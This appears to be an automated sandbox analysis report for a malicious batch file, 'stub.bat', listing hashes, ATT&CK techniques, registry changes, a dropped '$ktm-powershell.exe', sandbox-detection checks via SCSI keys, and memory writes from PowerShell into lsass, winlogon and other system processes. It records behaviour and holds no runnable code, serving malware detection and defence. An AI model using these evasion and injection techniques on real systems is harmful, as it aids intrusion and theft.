cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1

Resubmissions

08/07/2024, 15:19

240708-sqj4jaxflf 10

08/07/2024, 13:40

240708-qyw2ys1gll 8

Analysis

max time kernel
600s
max time network
440s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
08/07/2024, 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

stub.bat
Size

3.4MB
MD5

c27b8c9f05c86817d8d287f0d0bd8698
SHA1

239748a1871a85c7df6733bc24d9497a331aca87
SHA256

cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
SHA512

fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
SSDEEP

49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	2296	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5052	$ktm-powershell.exe

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\system32\PerfStringBackup.TMP	WMIADAP.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	svchost.exe
File created	C:\Windows\system32\perfh009.dat	WMIADAP.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx	svchost.exe
File created	C:\Windows\system32\perfc009.dat	WMIADAP.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	svchost.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WMIADAP.EXE
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	WMIADAP.EXE

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	WMIADAP.EXE
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	WMIADAP.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2296	powershell.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	svchost.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\CLSID	winlogon.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0"	winlogon.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "172"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d005500530000000000	winlogon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile	winlogon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession	winlogon.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1136334635-2482839916-910800802-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
5052	$ktm-powershell.exe
5052	$ktm-powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
2088	Process not Found
2608	Process not Found
1708	Process not Found
3148	Process not Found
1832	Process not Found
5088	Process not Found
652	Process not Found
3080	Process not Found
4580	Process not Found
3228	Process not Found
1360	Process not Found
1276	Process not Found
1336	Process not Found
2508	Process not Found
4752	Process not Found
3860	Process not Found
5108	Process not Found
2208	Process not Found
1304	Process not Found
2908	Process not Found
2924	Process not Found
3056	Process not Found
1628	Process not Found
4740	Process not Found
4312	Process not Found
3476	Process not Found
2076	Process not Found
1484	Process not Found
1076	Process not Found
4760	Process not Found
4408	Process not Found
4736	Process not Found
2784	Process not Found
772	Process not Found
2860	Process not Found
388	Process not Found
3280	Process not Found
3764	Process not Found
964	Process not Found
2920	Process not Found
4940	Process not Found
3684	Process not Found
952	Process not Found
728	Process not Found
1188	Process not Found
2704	Process not Found
1436	Process not Found
3272	Process not Found
1204	Process not Found
2256	Process not Found
392	Process not Found
4448	Process not Found
352	Process not Found
2368	Process not Found
1808	Process not Found
3824	Process not Found
968	Process not Found
720	Process not Found
4496	Process not Found
1856	Process not Found
3452	Process not Found
5076	Process not Found
2200	Process not Found
1724	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	5052	$ktm-powershell.exe
Token: SeCreateGlobalPrivilege	4168	dwm.exe
Token: SeChangeNotifyPrivilege	4168	dwm.exe
Token: 33	4168	dwm.exe
Token: SeIncBasePriorityPrivilege	4168	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	2440	dwm.exe
Token: SeChangeNotifyPrivilege	2440	dwm.exe
Token: 33	2440	dwm.exe
Token: SeIncBasePriorityPrivilege	2440	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	4804	dwm.exe
Token: SeChangeNotifyPrivilege	4804	dwm.exe
Token: 33	4804	dwm.exe
Token: SeIncBasePriorityPrivilege	4804	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	1820	dwm.exe
Token: SeChangeNotifyPrivilege	1820	dwm.exe
Token: 33	1820	dwm.exe
Token: SeIncBasePriorityPrivilege	1820	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	2412	dwm.exe
Token: SeChangeNotifyPrivilege	2412	dwm.exe
Token: 33	2412	dwm.exe
Token: SeIncBasePriorityPrivilege	2412	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	3688	dwm.exe
Token: SeChangeNotifyPrivilege	3688	dwm.exe
Token: 33	3688	dwm.exe
Token: SeIncBasePriorityPrivilege	3688	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	2784	dwm.exe
Token: SeChangeNotifyPrivilege	2784	dwm.exe
Token: 33	2784	dwm.exe
Token: SeIncBasePriorityPrivilege	2784	dwm.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeCreateGlobalPrivilege	1468	dwm.exe
Token: SeChangeNotifyPrivilege	1468	dwm.exe
Token: 33	1468	dwm.exe
Token: SeIncBasePriorityPrivilege	1468	dwm.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3396	Explorer.EXE
3396	Explorer.EXE

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE
3396	Explorer.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1432	LogonUI.exe
3396	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3676 wrote to memory of 2296	3676	cmd.exe	81
PID 3676 wrote to memory of 2296	3676	cmd.exe	81
PID 2296 wrote to memory of 644	2296	powershell.exe	5
PID 2296 wrote to memory of 700	2296	powershell.exe	7
PID 2296 wrote to memory of 1004	2296	powershell.exe	12
PID 2296 wrote to memory of 548	2296	powershell.exe	13
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 2296 wrote to memory of 780	2296	powershell.exe	14
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 2296 wrote to memory of 684	2296	powershell.exe	15
PID 2296 wrote to memory of 1044	2296	powershell.exe	16
PID 2296 wrote to memory of 1064	2296	powershell.exe	17
PID 2296 wrote to memory of 1196	2296	powershell.exe	19
PID 2296 wrote to memory of 1244	2296	powershell.exe	20
PID 2296 wrote to memory of 1284	2296	powershell.exe	21
PID 2296 wrote to memory of 1340	2296	powershell.exe	22
PID 2296 wrote to memory of 1420	2296	powershell.exe	23
PID 2296 wrote to memory of 1472	2296	powershell.exe	24
PID 2296 wrote to memory of 1524	2296	powershell.exe	25
PID 2296 wrote to memory of 1580	2296	powershell.exe	26
PID 2296 wrote to memory of 1600	2296	powershell.exe	27
PID 2296 wrote to memory of 1684	2296	powershell.exe	28
PID 2296 wrote to memory of 1748	2296	powershell.exe	29
PID 2296 wrote to memory of 1796	2296	powershell.exe	30
PID 2296 wrote to memory of 1868	2296	powershell.exe	31
PID 2296 wrote to memory of 1900	2296	powershell.exe	32
PID 2296 wrote to memory of 5052	2296	powershell.exe	86
PID 2296 wrote to memory of 5052	2296	powershell.exe	86
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 2296 wrote to memory of 1960	2296	powershell.exe	33
PID 2296 wrote to memory of 1968	2296	powershell.exe	34
PID 2296 wrote to memory of 1652	2296	powershell.exe	35
PID 2296 wrote to memory of 1944	2296	powershell.exe	36
PID 2296 wrote to memory of 2164	2296	powershell.exe	37
PID 2296 wrote to memory of 2312	2296	powershell.exe	39
PID 2296 wrote to memory of 2400	2296	powershell.exe	40
PID 2296 wrote to memory of 2564	2296	powershell.exe	41
PID 2296 wrote to memory of 2572	2296	powershell.exe	42
PID 2296 wrote to memory of 2600	2296	powershell.exe	43
PID 2296 wrote to memory of 2628	2296	powershell.exe	44
PID 2296 wrote to memory of 2728	2296	powershell.exe	45
PID 2296 wrote to memory of 2736	2296	powershell.exe	46
PID 2296 wrote to memory of 2748	2296	powershell.exe	47
PID 644 wrote to memory of 4168	644	winlogon.exe	88
PID 644 wrote to memory of 4168	644	winlogon.exe	88
PID 2296 wrote to memory of 4168	2296	powershell.exe	88
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 2296 wrote to memory of 2756	2296	powershell.exe	48
PID 2296 wrote to memory of 2896	2296	powershell.exe	49
PID 2296 wrote to memory of 2992	2296	powershell.exe	50
PID 2296 wrote to memory of 3160	2296	powershell.exe	51
PID 2296 wrote to memory of 3396	2296	powershell.exe	52
PID 644 wrote to memory of 2440	644	winlogon.exe	553
PID 644 wrote to memory of 2440	644	winlogon.exe	553
PID 2296 wrote to memory of 2440	2296	powershell.exe	553
PID 2296 wrote to memory of 3556	2296	powershell.exe	53
PID 700 wrote to memory of 2628	700	lsass.exe	44
PID 2296 wrote to memory of 3572	2296	powershell.exe	54
PID 2296 wrote to memory of 3984	2296	powershell.exe	57
PID 644 wrote to memory of 4804	644	winlogon.exe	495
PID 644 wrote to memory of 4804	644	winlogon.exe	495
PID 2296 wrote to memory of 4804	2296	powershell.exe	495

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:548
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1820
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x0 /state0:0xa3a15855 /state1:0x41c64e6d
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  PID:1432

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1524
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004E0
  2⤵
  PID:928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2572

